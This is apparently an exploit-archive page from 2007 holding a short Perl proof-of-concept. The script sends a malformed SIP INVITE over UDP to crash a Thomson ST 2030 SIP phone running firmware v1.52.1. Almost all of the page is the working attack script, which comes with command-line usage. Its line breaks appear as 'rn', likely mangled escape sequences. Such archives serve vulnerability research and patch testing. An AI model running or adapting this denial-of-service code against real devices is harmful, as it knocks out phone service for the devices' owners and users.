[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Thomson SIP phone ST 2030 Remote Denial of Service Exploit
# Published : 2007-08-27
# Author : MADYNES
# Previous Title : PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)
# Next Title : PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow PoC
#!/usr/bin/perl
#Vulneravility for Thomson 2030 firmware v1.52.1
#It provokes a DoS in the device.
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP 192.168.1.2;branch=00rnFrom: <sip:tucu@192.168.1.2>;tag=00rnTo: <A15+-97:=:%0B>;tag=00rnCall-ID: humbol@192.168.1.2rnCSeq: 1 INVITErnrn";
$socket->send($msg);
# www.Syue.com [2007-08-27]